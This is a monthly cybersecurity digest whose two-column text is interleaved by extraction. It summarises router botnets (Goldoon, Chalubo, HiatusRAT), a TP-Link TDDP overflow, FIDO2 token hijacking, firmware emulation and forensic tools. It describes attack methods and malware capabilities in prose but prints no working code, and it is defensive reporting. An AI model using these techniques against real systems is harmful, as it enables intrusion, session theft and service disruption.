NOTHING

SAYS
'SECURITY'
LIKE A
DOZEN
FIREWALLS
AND A
BIOMETRIC
SCANNER

OVERKILL SECURITY
Find more:
BOOSTY
SPONSR
TELEGRAM MONTHLY DIGEST. 2024 / 06
Section: “Keypoints”
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying
high-impact summaries of in-depth
informed on the most recent developments, insights, and best practices in the ever-
content, serving as a compacted
edition of the other sections for evolving field of security. In this issue, we have curated a diverse collection of articles,
quick, comprehensive overviews. news, and research findings tailored to both professionals and casual enthusiasts. Our
digest aims to make our content both engaging and accessible. Happy reading!
Section: “Unpacking”
tailored for critically reviews
existing cyber content, highlighting
benefits, drawbacks aspects.

Section: “Research”
original studies, experiments and
in-depth investigations offering
comprehensive reports and
findings that advance the
understanding of cybersecurity
issues.
Read more: Boosty | Sponsr | TG
Read more: Boosty | Sponsr | TG

NEWS

3
 Read more: Boosty | Sponsr | TG

BOTNET TARGETS �E-commerce and Online Services: Companies in this sector

DECADE-OLD FLAW IN could be targets of DDoS attacks launched from compromised devices,
potentially leading to service disruptions and financial losses.
UNPATCHED D-LINK
DEVICES �Healthcare: With a growing number of healthcare services
relying on internet connectivity, compromised routers could pose risks
Botnet, named "Goldoon," has to patient data integrity and availability of critical services.
been targeting a decade-old
vulnerability in unpatched D-Link Consequences
devices. �Network Compromise and Data Breaches: Attackers can
�Vulnerability Exploited: gain complete control over compromised routers, potentially leading
Goldoon exploits CVE-2015- to data theft, including sensitive personal and financial information.
2051, a critical security flaw with a CVSS score of 9.8, affecting D- �Distributed Denial-of-Service (DDoS) Attacks: The botnet
Link DIR-645 routers. This vulnerability allows remote attackers to can launch various DDoS attacks, which could cripple network
execute arbitrary commands via specially crafted HTTP requests. infrastructure, disrupt services, and cause significant downtime for
�Botnet Activities: Once a device is compromised, attackers affected organizations.
gain complete control, enabling them to extract system information, �Increased Operational Costs: Organizations may need to
establish communication with a command-and-control (C2) server, invest in enhanced security measures, conduct widespread audits, and
and use the devices to launch further attacks, such as distributed denial- replace or update vulnerable devices, leading to increased operational
of-service (DDoS) attacks. expenses.
�DDoS Attack Methods: The Goldoon botnet is capable of �Reputational Damage: Companies affected by attacks
launching a variety of DDoS attacks using methods such as TCP stemming from compromised routers may suffer reputational damage
flooding, ICMP flooding, and more specialized attacks like Minecraft if they are perceived as not adequately protecting customer data or
DDoS. ensuring service availability.
�Propagation and Stealth: The botnet initiates its attack by �Regulatory and Legal Implications: Entities that fail to
exploiting CVE-2015-2051 to deploy a "dropper" script from a secure their networks adequately may face regulatory scrutiny and
malicious server. This script is designed to be self-erasing to avoid potential legal challenges, especially if consumer data is compromised
detection and operates across various Linux system architectures. The due to negligence in addressing known vulnerabilities.
dropper downloads and executes a file, setting the stage for further
malicious activities.
�Mitigation and Prevention: Users are urged to update their D- QEMU TO EMULATE
Link devices promptly. Additionally, implementing network
monitoring solutions, establishing strong firewall rules, and staying
IOT FIRMWARE
informed about the latest security bulletins and patches are crucial The article provides a detailed
steps in staying ahead of evolving threats. guide on using QEMU to emulate
IoT firmware, specifically focusing
�Impact and Severity: The exploitation of CVE-2015-2051 by
on a practical example involving the
the Goldoon botnet presents a low attack complexity but has a critical emulation of a router's firmware.
security impact that can lead to remote code execution. The botnet's The author shares insights and
activity spiked in April 2024, almost doubling the usual frequency. detailed steps on how to effectively
�Recommendations: Fortinet recommends applying patches use QEMU for security research and
and updates whenever possible due to the ongoing development and testing purposes.
introduction of new botnets. Organizations are also advised to go �Overview of QEMU: QEMU stands for "Quick EMUlator"
through Fortinet’s free cybersecurity training module to help end users and is utilized to emulate various hardware architectures, making it a
learn how to identify and protect themselves from phishing attacks. valuable tool for security researchers who need to test software in a
Affected Industries controlled environment without physical hardware. Guide emphasizes
the use of Ubuntu 18.04 for setting up QEMU due to its ease of
�Home and Small Business Networks: These are directly managing interfaces on this distribution.
impacted as D-Link routers are commonly used in these environments.
The compromise of these routers can lead to network disruptions and �Initial Setup and Installation: The document outlines the
unauthorized access to network traffic. initial steps to install QEMU and its dependencies on Ubuntu 18.04,
including the installation of libraries and tools necessary for network
�Internet Service Providers (ISPs): ISPs may face increased bridging and debugging with pwndbg.
pressure to assist customers in updating or replacing vulnerable
devices, and they may experience increased network load from DDoS �Firmware Analysis and Preparation: Binwalk is used to
attacks originating from compromised routers. analyze and extract the contents of the firmware. The guide details how
to use Binwalk to identify and decompress the components of the
�Cybersecurity Firms: These organizations may see an firmware, focusing on the squashfs file system which is crucial for the
increased demand for security services, including threat detection, emulation process.
system hardening, and response to incidents involving compromised
routers. �Emulation Process: Chroot Environment involves copying the
qemu-mips-static binary to the firmware directory and using chroot to
run the firmware's web server directly. System Mode Emulation uses

4
 Read more: Boosty | Sponsr | TG
a script and additional downloads (like vmlinux and a Debian image) �Firmware Updates: Regularly updating the firmware of TP-
to create a more stable and integrated emulation environment. Link devices to the latest version can help patch vulnerabilities and
improve security.
�Debugging and Network Configuration: Detailed steps are
provided on setting up network bridges and interfaces to allow the �Network Segmentation: Placing critical devices on separate
emulated firmware to communicate with the host system.The guide network segments can limit the spread of potential attacks.
also covers the mounting of various directories (/dev, /proc, /sys) to
ensure the emulated system has access to necessary resources. �Firewall Rules: Configuring firewalls to restrict incoming
traffic on UDP port 1040, which is used by TDDP, can prevent
�Running and Interacting with the Emulated Firmware: unauthorized access.
Once the setup is complete, the firmware is run, and the user can �Vulnerability Scanners: Using security tools to regularly scan
interact with the emulated web server through a browser. The guide for vulnerabilities can help identify and mitigate them before they are
includes troubleshooting tips for common issues like incorrect paths or exploited
missing files that might cause the server to fail.
Overview of TDDP
�Security Testing and Reverse Engineering: The document
concludes with insights into using the emulation setup for security �TP-Link Device Debug Protocol (TDDP): A binary protocol
testing and reverse engineering. It mentions tools like Burp Suite for used primarily for debugging purposes that operates through a single
capturing web requests and Ghidra for analyzing binaries. UDP packet. This protocol is documented in patent CN102096654A.

�Practical Demonstration: A practical demonstration of finding �Packet Structure: The TDDP packet includes fields such as
and exploiting a command injection vulnerability in the emulated Version, Type, Code, ReplyInfo, PktLength, PktID, SubType,
Reserve, and MD5 Digest, which are crucial for the protocol's
firmware is provided, showcasing how QEMU can be used to test and
operation.
develop proofs of concept for security vulnerabilities.
Vulnerability Analysis / Function Analysis:
�tddpEntry (sub_4045f8 0x004045F8): This function
TP-LINK TDDP continuously checks for incoming data using the recvfrom function
BUFFER OVERFLOW and passes the data to TddpPktInterfaceFunction without validating the
received data size.
VULNERABILITY
�GetTddpMaxPktBuff (sub_4042d0 0x004042D0): Returns a
The article provides a detailed buffer size of 0x14000.
analysis of a specific vulnerability
in TP-Link devices that was �tddp_versionTwoOpt (sub_404b40 0x00405990) and
reported in 2020 but did not tddp_deCode (sub_404fa4 0x00405014): Functions involved in
receive a CVE assignment. processing and decoding the TDDP packet. They handle data
Causes of the TP-Link decryption using DES and verify the integrity of the decrypted data.
TDDP Buffer Overflow Exploitation Mechanism
Vulnerability
�Buffer Overflow Trigger: The vulnerability is triggered when
The TP-Link TDDP (TP-LINK Device Debug Protocol) buffer the packet length specified in the TDDP packet exceeds the buffer size
overflow vulnerability primarily stems from the protocol's handling of (0x14000), leading to a buffer overflow.
UDP packets. TDDP, a binary protocol used for debugging purposes,
processes packets through a single UDP packet, which is prone to �Decryption and MD5 Verification: The des_min_do function
security risks if not properly handled. The specific cause of the buffer is used for decryption, and the MD5 digest of the packet is verified
overflow is the lack of proper verification of data length during the against the MD5 digest of the data. If the packet length is manipulated
parsing of these UDP packets. This oversight allows for memory to exceed the buffer size, it leads to memory corruption and a denial of
overflow, which corrupts the memory structure of the device service (DoS).
Impacts of the Vulnerability Proof of Concept (PoC)
The primary impact of the TP-Link TDDP buffer overflow �Setup: The PoC involves setting up a virtual machine (VM)
vulnerability is a denial of service (DoS). This occurs when the with the firmware and running the tddpd service.
overflow corrupts the memory structure, causing the device to crash or
become unresponsive. Additionally, there is a potential for remote �Exploit Code: The document includes Python code that crafts
code execution, which could allow an attacker to execute arbitrary a TDDP packet with specific fields manipulated to trigger the buffer
code on the device. This could lead to unauthorized access to the overflow.
network, data theft, or further exploitation of network resources
�Result: Executing the PoC results in the tddpd program
Exploitation Techniques crashing, confirming the vulnerability.
Exploitation of the TP-Link TDDP buffer overflow vulnerability Conclusion
involves sending crafted UDP packets that exceed the buffer limits set
by the protocol. This can be achieved by manipulating the packet's data �Impact: The vulnerability leads to a denial of service and
length to be longer than what the buffer can handle, leading to potentially allows for remote code execution if further exploited.
overflow. Tools like Shambles can be used to identify, reverse,
emulate, and validate such buffer overflow conditions. Successful �Recommendations: Regular updates and patches, network
exploitation could allow attackers to cause a denial of service or segmentation, and proper validation of incoming data are
potentially execute arbitrary code on the device recommended to mitigate such vulnerabilities.
Mitigation Strategies

5
 Read more: Boosty | Sponsr | TG

QCSUPER: Telecommunications Industry:

EAVESDROPPING ON �Network Analysis: QCSuper enables telecom operators to
DEVICE BECOMES A capture and analyze radio communication exchanges between mobile
devices and the network. This helps in understanding network
HOBBY performance, diagnosing issues, and optimizing network
QCSuper is a versatile tool that configurations.
serves multiple purposes across �Protocol Compliance: By capturing raw radio frames, telecom
different sectors. Its ability to companies can ensure that their networks comply with industry
capture and analyze raw radio standards and protocols, such as those defined by 3GPP for 2G, 3G,
frames from Qualcomm-based 4G, and 5G networks.
devices makes it indispensable for
telecom operators, security Mobile Security:
researchers, network developers, and educators.
�Security Research: Security researchers can use QCSuper to
Main Features of QCSuper study vulnerabilities in mobile networks. By analyzing the captured
frames, they can identify potential security flaws and develop
�Protocol Support: Captures raw radio frames for 2G (GSM), mitigation strategies.
2.5G (GPRS and EDGE), 3G (UMTS), and 4G (LTE) networks. Partial
support for 5G is available for certain models �Penetration Testing: QCSuper is useful for conducting
penetration tests on mobile networks. It allows security professionals
�Device Compatibility: Works with Qualcomm-based phones to simulate attacks and assess the resilience of the network against
and modems, including rooted Android devices and USB dongles various threats.
�Data Output: Generates PCAP files with GSMTAP Network Research and Development:
encapsulation, which can be analyzed using Wireshark
�Protocol Analysis: Researchers can use QCSuper to capture
�Ease of Use: Simple commands to start capturing data and analyze signaling information and user data at different layers of
the mobile network stack. This is crucial for developing new protocols
�Cross-Platform Support: Can be installed on both Linux and and improving existing ones.
Windows systems, with detailed instructions provided for both
platforms �5G Research: With partial support for 5G, QCSuper is
instrumental in studying the latest advancements in mobile technology.
�Research and Analysis: Widely used by telecom, mobile, and Researchers can analyze 5G frames to understand the new features and
security researchers for analyzing radio communication exchanges challenges associated with 5G networks.
Hardware Requirements for Using QCSuper Educational and Training Purposes:
�Qualcomm-Based Devices: The primary requirement is a �Training Programs: QCSuper is used in training programs to
Qualcomm-based phone or modem. This is because QCSuper relies on educate telecom and security professionals about mobile network
the Qualcomm Diag protocol to capture raw radio frames protocols and security. It provides hands-on experience in capturing
�Rooted Android Phone or USB Modem: For Android and analyzing real-world network traffic.
phones, the device must be rooted to access the necessary diagnostic �Academic Research: Universities and research institutions can
interfaces leverage QCSuper for academic projects and research, helping
�Operating System Compatibility: QCSuper has been tested students and researchers gain practical insights into mobile network
on Ubuntu LTS 22.04 and Windows 11. It is recommended to use operations.
Linux for better compatibility
�Wireshark: Wireshark is needed to analyze the PCAP files
generated by QCSuper. Different versions of Wireshark are required
INCIDENT RESPONSE
depending on the type of frames being captured (e.g., Wireshark 2.x - MADE EASY: USING
4.x for 2G/3G frames, Wireshark 2.5.x for 4G frames, and Wireshark BUCKETLOOT FOR
3.6.x for 5G frames)
CLOUD STORAGE
Limitations FORENSICS
�QCSuper cannot be used with non-Qualcomm phones. The tool BucketLoot,is a versatility tool
specifically relies on the Qualcomm Diag protocol to capture raw radio across multiple cloud platforms,
frames, which is a proprietary protocol available only on Qualcomm- and comprehensive feature set
based devices. Therefore, it is not compatible with phones or modems make it a valuable addition to the
that do not use Qualcomm chipsets toolbox of security professionals,
�QCSuper cannot capture 5G radio frames on all devices. The DevOps teams, and organizations seeking to enhance their cloud
ability to capture 5G frames is limited to certain models of Qualcomm- security posture and protect sensitive data stored in cloud object
based devices. The tool has partial support for 5G, and this storage buckets.
functionality has been tested under specific conditions with Wireshark Key Features
3.6.x. Therefore, not all Qualcomm-based devices will necessarily
support 5G frame capture, and users may need to verify compatibility �Automated Cloud Bucket Inspection: BucketLoot can
for their specific device model. automatically scan and inspect S3-compatible cloud storage buckets
across multiple platforms, including Amazon Web Services (AWS),
Application

6
 Read more: Boosty | Sponsr | TG
Google Cloud Storage (GCS), DigitalOcean Spaces, and custom FIDO2: PHISHING-
domains/URLs.
RESISTANT, BUT NOT
�Asset Extraction: The tool can extract valuable assets stored TOKEN-RESISTANT
in the buckets, such as URLs, subdomains, and domains, which can be
useful for attack surface management and reconnaissance. The article on Silverfort's blog
explores how MITM attacks can
�Secret Exposure Detection: BucketLoot can detect and flag bypass FIDO2's phishing-resistant
potential secret exposures, such as API keys, access tokens, and other protections. It details the FIDO2
sensitive information, helping organizations identify and mitigate authentication flow, highlights
security risks. vulnerabilities in session token
handling, and provides real-world
�Custom Keyword and Regex Searching: Users can search examples involving Entra ID SSO,
for specific keywords or regular expressions within the bucket files, PingFederate, and Yubico Playground, concluding with mitigation
enabling targeted searches for sensitive data or specific types of strategies to enhance security.
information.
FIDO2 Background
�Efficient Scanning: BucketLoot focuses on scanning files that
store data in plain-text formats, optimizing the scanning process and �FIDO2 is a modern passwordless authentication standard
improving performance. developed by the FIDO Alliance to replace passwords
�Flexible Scanning Modes: The tool offers a guest mode for �It aims to protect against phishing, man-in-the-middle
initial scans without requiring credentials, as well as a complete scan (MITM), and session hijacking attacks
mode with platform credentials for more comprehensive analysis.
�The authentication flow involves device registration and
�JSON Output: BucketLoot provides its output in a JSON authentication steps using public key cryptography
format, making it easy to parse and integrate the results into existing
workflows or other security tools. FIDO2 Security Features

Usefulness Across Industries and for Security Experts �FIDO2 is designed to prevent phishing, MITM, and session
hijacking attacks
�Cybersecurity Professionals: BucketLoot is an invaluable
tool for cybersecurity professionals, such as penetration testers, bug �However, the research found that FIDO2 implementations
hunters, and security researchers, as it aids in identifying potential often do not protect session tokens after successful authentication
vulnerabilities and data exposures in cloud storage configurations. Attacking FIDO2 with MITM
�Cloud Service Providers: Organizations that offer cloud �The author investigated MITM attacks on identity providers
services can leverage BucketLoot to ensure the security of their (IdPs) that relay communications between devices
customers' data stored in cloud buckets and maintain compliance with
industry standards. �While MITM is more difficult with TLS, methods like DNS
spoofing, ARP poisoning, and certificate theft can achieve it
�DevSecOps and DevOps Teams: By integrating BucketLoot
into their workflows, DevSecOps and DevOps teams can proactively �By performing MITM on the IdP, the attacker can hijack the
identify and mitigate security risks associated with cloud storage, session token after FIDO2 authentication
promoting secure software development practices.
Entra ID SSO (Microsoft)
�Incident Response and Forensics: In the event of a data
breach or security incident, BucketLoot can assist incident response �Overview: Entra ID SSO is a single sign-on solution that
teams and forensic investigators in quickly identifying exposed data supports various SSO protocols and modern authentication methods,
and potential attack vectors related to cloud storage misconfigurations. including FIDO2.

�Compliance and Risk Management: Organizations subject to �Vulnerability: The research demonstrated that an attacker
regulatory compliance requirements, such as GDPR, HIPAA, or PCI- could hijack sessions by exploiting the way Entra ID handles session
DSS, can use BucketLoot to ensure the secure handling of sensitive tokens.
data stored in cloud buckets and demonstrate adherence to data
protection standards. �Attack Method: The attacker does not need to relay the entire
authentication process. Instead, they can use a signed token provided
�Bug Bounty Programs: Bug bounty hunters and researchers by the IdP, which has an expiration time of one hour. This token can
can leverage BucketLoot to uncover potential vulnerabilities and data be reused within the valid time frame to generate state cookies for a
exposures in cloud storage configurations, contributing to the overall longer period.
security posture of organizations and earning rewards.
�Example: The native Azure Management portal application
does not validate the token granted by the SSO, allowing an attacker
to use a stolen token to gain unauthorized access.
PingFederate
�Overview: PingFederate is an SSO solution that uses third-
party adapters to perform authentication. These adapters can be
chained into an authentication policy flow.
�Vulnerability: The research found that if the relying party
developer does not validate the OIDC token (or SAML Response), the
MITM attack can be successful.

7
 Read more: Boosty | Sponsr | TG

�Attack Method: The attack exploits the weakest link in the developers working on embedded systems or resource-constrained
authentication chain. Since the SSO protocols rely on granting tokens devices, where efficient use of limited resources is crucial.
that can be reused by different devices, an attacker can hijack the
session by stealing these tokens. �Appreciation of Computing History: The project could be
featured in museums or exhibitions dedicated to the history of
�Example: The PingOne adapter can be used with FIDO2 computing, showcasing the ingenuity and creativity of early
capabilities. If the OIDC token is not validated, an attacker can bypass programmers working with limited hardware resources.
FIDO2 protections and gain unauthorized access.
�Inspiration for Future Projects: The success of this project
Yubico Playground could motivate others to explore the limits of legacy hardware or
undertake similar challenging projects, pushing the boundaries of what
�Overview: Yubico Playground is a testing environment for is possible on vintage systems.
FIDO security features and keys.
�Vulnerability: The research showed that a simple session
cookie generated after FIDO2 authentication can be exploited. ICSPECTOR: SOLVING
�Attack Method: There is no validation on the device that PROBLEMS YOU DIDN'T
requested the session cookie. Any device can use this cookie until it KNOW YOU HAD
expires, allowing an attacker to bypass the authentication step.
Microsoft ICS Forensics Tools
�Example: By acquiring the session cookie, an attacker can framework, known as ICSpector, is
access the user's private area and remove the security key from the an open-source tool designed to
user's profile, demonstrating a straightforward session hijacking facilitate the forensic analysis of
scenario Industrial Control Systems (ICS),
particularly focusing on
Programmable Logic Controllers
(PLCs).
RAYTRACING ON A ZX
Key Technical Points of ICSpector
SPECTRUM: WHO
NEEDS MODERN GPUS Framework Composition and Architecture
WHEN YOU CAN SPEND �Modular Design: ICSpector is composed of several
A WEEKEND components that can be developed and executed separately, allowing
for flexibility and customization based on specific needs. Users can
RENDERING A SINGLE also add new analyzers
FRAME TO PROVE THAT
�Network Scanner: Identifies devices communicating via
MASOCHISM CAN BE A supported OT protocols and ensures they are responsive. It can work
HOBBY? with a provided IP subnet or a specific IP list exported from OT
security products.
ZX Raytracer is project not only demonstrates the feasibility of
implementing a raytracer on the ZX Spectrum but also serves as an �Data Extraction & Analyzer: Extracts PLC project metadata
educational resource, a celebration of computing history, and an and logic, converting raw data into a human-readable form to highlight
inspiration for future projects in retro computing, embedded systems, areas that may indicate malicious activity.
and optimization techniques
Forensic Capabilities
Key Points & Potential Uses
�Identification of Compromised Devices: Helps in identifying
�Implementing a Raytracer on Legacy Hardware: The compromised devices through manual verification, automated
project demonstrates the possibility of implementing a raytracer, a monitoring, or during incident response.
computationally intensive graphics rendering technique, on the ZX
Spectrum, a home computer from the 1980s with very limited �Snapshot Creation: Allows for the creation of snapshots of
hardware capabilities (3.5MHz Z80A CPU and often only 16KB controller projects to compare changes over time, aiding in the
RAM). detection of tampering or anomalies.

�Overcoming Hardware Limitations: Despite the severe �Support for Siemens PLCs: Currently supports Siemens
hardware constraints, the project overcame challenges like attribute SIMATIC S7-300 and S7-400 families, with plans to support other
clash (color limitations), low resolution (256x176 pixels), and slow PLC families in the future.
performance (initial render time of 17 hours per frame) through clever Integration with Other Tools
optimizations and approximations.
�Microsoft Defender for IoT: Can be used alongside Microsoft
�Educational Tool: The project could be used as a teaching aid Defender for IoT, which provides network-layer security, continuous
in computer science courses, particularly those focused on computer monitoring, asset discovery, threat detection, and vulnerability
graphics, optimization techniques, or low-level programming. management for IoT/OT environments.
�Retro Gaming and Demoscene Exhibitions: The raytracer Use Cases
could be showcased at retro computing events, demoscene parties, or
exhibitions celebrating the achievements of vintage hardware and �Incident Response: Useful for incident response operations to
programming. detect compromised devices and understand if PLC code was tampered
with.
�Embedded Systems Development: The optimization
techniques and approximations used in this project could inspire

8
 Read more: Boosty | Sponsr | TG

�Proactive Security: Helps in proactive incident response by �Written in C# and WPF: OFGB is developed using C# and
comparing PLC programs on engineering workstations with those on Windows Presentation Foundation (WPF), which provides a graphical
the actual devices to detect unauthorized changes. user interface for the tool.
Industries �Credits and Inspiration: The registry keys and comments
�Nuclear, Thermal, and Hydroelectric Power Plants: Power about their function were inspired by Shawn Brink's script.
plants rely heavily on Industrial Control Systems (ICS) to manage Additionally, the app's theme is influenced by a project called DarkNet
critical operations. ICSpector can be used to ensure the integrity of by Aldaviva.
Programmable Logic Controllers (PLCs) that control these processes.
By detecting any anomalous indicators or compromised �Building the Tool: To build OFGB, users need Visual Studio
configurations, ICSpector helps prevent disruptions that could lead to and the .NET 8.0 SDK. The repository can be cloned or downloaded
power outages or safety hazards. as a ZIP file, and the solution can be built in Visual Studio using Ctrl
+ Shift + B or the Build > Build Solution menu option.
�Water Treatment Plants: These facilities use ICS to control
the treatment processes that ensure water safety. ICSpector can help in �Safety and Distribution: The developer emphasizes that
monitoring and verifying the integrity of PLCs, ensuring that the water GitHub is the only official distribution platform for OFGB. Downloads
treatment processes are not tampered with, which is crucial for public from other websites are not guaranteed to be safe.
health and safety.
�Alternative Suggestion: For users who want to avoid dealing
�Industrial Manufacturing: In manufacturing environments, with these ads altogether, the developer humorously suggests trying
ICS are used to control machinery and production lines. ICSpector can Linux.
be used to detect any unauthorized changes or anomalies in the PLCs,
ensuring consistent product quality and preventing costly downtimes Advantages of OFGB:
due to equipment failure.
�Simple and User-Friendly Interface: OFGB provides a
�Critical Infrastructure Sectors: This includes sectors like straightforward graphical user interface (GUI) with checkboxes for
energy, water, transportation, and communication systems. ICSpector different types of ads, making it easy for non-technical users to disable
can be used to safeguard the ICS that control these critical ads without dealing with the Windows Registry directly.
infrastructures from cyberattacks, ensuring their continuous and secure
operation. �Comprehensive Ad Removal: OFGB covers a wide range of
ads, including those in the Start Menu, File Explorer, Lock Screen,
�Chemical Processing Plants: These plants use ICS to manage Settings app, and more, providing a one-stop solution for ad removal.
complex chemical processes. ICSpector can help in ensuring that the
PLCs controlling these processes are secure and have not been �Open-Source and Free: Being an open-source project
tampered with, which is vital for preventing hazardous incidents. available on GitHub, OFGB is free to use, and users can inspect the
source code for transparency and security.
�Oil and Gas Industry: ICS are used extensively in the oil and
gas sector for drilling, refining, and distribution processes. ICSpector Disadvantages of OFGB:
can be used to monitor and verify the integrity of these systems,
preventing disruptions that could lead to significant financial losses �Limited Functionality: Unlike more comprehensive tools like
and environmental damage Shutup10 or Wintoys, OFGB is focused solely on ad removal and does
not offer additional features for privacy, telemetry, or other Windows
customizations.
REGISTRY HACKING �Potential Compatibility Issues: As a third-party tool
FOR DUMMIES: modifying the Windows Registry, there is a risk of compatibility issues
or conflicts with future Windows updates, which could potentially
REMOVING ADS THE break the ad removal settings.
HARD WAY BY OFGB
(OH FRICK GO BACK) �Lack of Automatic Updates: OFGB does not have an
automatic update mechanism, so users may need to manually check for
The OFGB (Oh Frick Go Back) and install new versions as Microsoft introduces new types of ads or
tool is designed to remove ads from changes registry keys.
various parts of the Windows 11
operating system by modifying In comparison, tools like Shutup10, Wintoys, and Tiny11 Builder
specific keys in the Windows offer more comprehensive functionality, including privacy and
Registry. telemetry controls, customization options, and the ability to create
custom Windows images. However, these tools may be more complex
Key Features and Functionality to use, especially for non-technical users.
�Ad Removal: The primary function of OFGB is to disable ads
that were introduced in a Windows 11 update on April 23, 2024. These
ads appear in various parts of the OS, including the File Explorer and
Start Menu.
�Registry Modification: The tool works by changing certain
keys in the Windows Registry. This method is used to disable the ads
effectively.

9
 Read more: Boosty | Sponsr | TG

FIRMWARE �C2 Servers: Cycles through hardcoded C2s, downloads the next
OVERWRITE: THE NEW stage, and decrypts it using ChaCha20.
TREND IN ROUTER �Persistence: The newer version does not maintain persistence
FASHION on infected devices.

The Chalubo RAT malware HiatusRAT Malware

campaign targeted specific models �Port 8816: HiatusRAT checks for existing processes on port
of Actiontec and Sagemcom 8816, kills any existing service, and opens a listener on this port.
routers, primarily affecting
Windstream's network. The �Information Collection: Collects host-based information and
malware used brute-force attacks to gain access, executed payloads in sends it to the C2 server to track the infection status and log information
memory to avoid detection, and communicated with C2 servers using about the compromised host.
encrypted channels. The attack led to a significant outage, requiring the
replacement of over 600,000 routers, highlighting the need for robust �Initial Access: Through exploiting vulnerabilities in router
security measures and regular updates to prevent such incidents. firmware or using weak credentials.
ISP Impact: �Persistence: Uses a bash script to download and execute
HiatusRAT and the packet-capture binary
�Windstream: ISP affected with over 600K routers rendered
inoperable between Oct 25th and Oct 27th, 2023. �Prebuilt Functions:
�Affected Models: Actiontec T3200, T3260, and Sagemcom �config: Loads new configuration values from the C2 node.
F5380.
�shell: Spawns a remote shell on the infected host.
�Impact: Approximately 49% of the ISP's modems were taken
offline, requiring hardware replacements. �file: Allows reading, deleting, or uploading files to the C2.
Global Impact: �executor: Downloads and executes files from the C2.
�Botnet Activity: From September to November 2023, Chalubo �script: Executes scripts supplied by the C2.
botnet panels interacted with up to 117,000 unique IP addresses over a
30-day period. �tcp_forward: Forwards TCP data from a specified port to
another IP address and port.
�Geographic Distribution: Most infections were in the US,
Brazil, and China. �socks5: Sets up a SOCKS5 proxy on the compromised router.

�Operational Silos: 95% of bots communicated with only one �quit: Ceases execution of the malware.
control panel, indicating distinct operational silos.
�Packet Capture: A variant of tcpdump is deployed to capture
Affected Routers and monitor router traffic on ports associated with email and file-
transfer communications
�Targeted Models: End-of-life business-grade routers.
Black Lotus Labs Uncovers New Router Malware Campaigns
�Actiontec T3200 and T3260 are VDSL2 wireless AC gateway
routers approved by Windstream. �Black Lotus Labs, the threat research team at Lumen
Technologies (formerly CenturyLink), has recently uncovered two
�Sagemcom F5380 is a WiFi6 (802.11ax) router. major malware campaigns targeting routers and networking devices
from different manufacturers. These discoveries highlight the
�DrayTek Vigor Models 2960 and 3900 increasing threats faced by internet infrastructure and the need for better
Malware: Chalubo RAT security practices.
The Hiatus Campaign
�First Spotted: August 2018 by Sophos Labs.
�In March 2023, Black Lotus Labs reported on a complex
�Primary Functions: DDoS attacks, execution of Lua scripts,
campaign called "Hiatus" that had been targeting business-grade
and evasion techniques using ChaCha20 encryption. routers, primarily DrayTek Vigor models 2960 and 3900, since June
Technical Details: 2022.

�Initial Infection: Uses brute-force attacks on SSH servers with �The threat actors exploited end-of-life DrayTek routers to
weak credentials (e.g., root:admin). establish long-term persistence without detection.

�Payload Delivery: �Around 4,100 vulnerable DrayTek models were exposed on the
internet, with Hiatus compromising approximately 100 of them across
�First Stage: bash script ("get_scrpc") fetches a 2script Latin America, Europe, and North America.
("get_strtriiush") which retrieves and executes the primary bot payload
("Chalubo" or "mips.elf"). �Upon infection, the malware intercepts data transiting the
infected router and deploys a Remote Access Trojan (RAT) called
�Execution: The malware runs in memory, wipes files from the "HiatusRAT" that can proxy malicious traffic to additional networks.
disk, and changes the process name to avoid detection.
�Black Lotus Labs has null-routed the Hiatus command-and-
�Communication: control (C2) servers across Lumen's global backbone and added the

10
 Read more: Boosty | Sponsr | TG
indicators of compromise (IoCs) to their Rapid Threat Defense system �Realistic Scenarios: By integrating these two methods,
to block threats before reaching customer networks. organizations can create more realistic and challenging scenarios that
better prepare employees for real-world threats.
The Pumpkin Eclipse Campaign
Metrics and Evaluation
�In late October 2023, Black Lotus Labs investigated a massive
outage affecting specific ActionTec (T3200s and T3260s) and �Measuring Effectiveness: Both phishing tests and fire drills
Sagemcom (F5380) gateway models within a single internet service should be evaluated using metrics to measure their effectiveness. This
provider's network. includes tracking the number of employees who fall for phishing tests
and the response times during fire drills.
�Over 600,000 devices displayed a static red light, indicating a
likely firmware corruption issue. �Continuous Improvement: The data collected from these
exercises should be used to continuously improve security training
�The attack was confined to a specific Autonomous System programs and incident response plans.
Number (ASN), impacting around 49% of exposed devices in that Organizational Culture
network.
�Promoting a Security-First Culture: Regular phishing tests
�Black Lotus Labs discovered a multi-stage infection mechanism and fire drills help promote a culture of security within the
that installed the Chalubo RAT, a botnet targeting SOHO gateways and organization. They reinforce the importance of security awareness and
IoT devices. preparedness among employees.
�Black Lotus Labs has added the IoCs from this campaign and �Encouraging Reporting: These exercises encourage
the Chalubo malware to their threat intelligence feed, fueling Lumen's employees to report suspicious activities and potential security
Connected Security portfolio. incidents, fostering a proactive security environment.

WHY CLICKING ON ANDROID LIVE THREAT

'URGENT INVOICE' DETECTION: 200
EMAILS IS THE BEST BILLION SCANS A DAY
WAY TO MAKE FRIENDS STILL WON'T CATCH
WITH IT EVERYTHING
The post titled "On Fire Drills The security updates
and Phishing Tests" discusses the announced at Google I/O 2024 are
importance of phishing tests and poised to enhance the security and
fire drills in enhancing privacy of Android devices
organizational security. significantly, impacting various
industries by reducing fraud, protecting sensitive data, and fostering
Importance of Phishing Tests greater trust in mobile technologies.
�Phishing Tests as Training Tools: Phishing tests are used to Google Play Protect Live Threat Detection:
train employees to recognize and respond to phishing attempts. They
simulate real-world phishing attacks to help employees identify �Functionality: Scans 200 billion Android apps daily using on-
suspicious emails and links. device AI to detect and mitigate malware and fraudulent apps.
�Behavioral Insights: These tests provide insights into �Implementation: Uses Private Compute Core for privacy-
employee behavior and the effectiveness of current training programs. preserving analysis.
They help identify which employees or departments are more
susceptible to phishing attacks. �Deployment: Available on devices from manufacturers like
Google Pixel, Honor, Lenovo, Nothing, OnePlus, Oppo, Sharp, and
Fire Drills for Incident Response Transsion.
�Simulated Incidents: Fire drills involve simulating security Stronger Protections Against Fraud and Scams:
incidents to test the organization's incident response capabilities. This
includes how quickly and effectively the team can detect, respond to, �Scam Call Detection: Uses Gemini-Nano AI to detect and
and mitigate security threats. alert users about potential scam calls in real-time.

�Preparedness and Improvement: Regular fire drills help �Screen Sharing Safeguards: Enhanced controls to prevent
ensure that the incident response team is prepared for actual security social engineering attacks during screen sharing.
incidents. They also highlight areas for improvement in the incident
response plan. �Advanced Cellular Security: New protections against cell site
simulators to prevent surveillance and SMS-based fraud.
Integration of Phishing Tests and Fire Drills
Private Space Feature:
�Comprehensive Security Training: Combining phishing tests
with fire drills provides a comprehensive approach to security training. �Functionality: Allows users to create a secure, siloed portion
It ensures that employees are not only aware of phishing threats but of the OS for sensitive information, similar to Incognito mode.
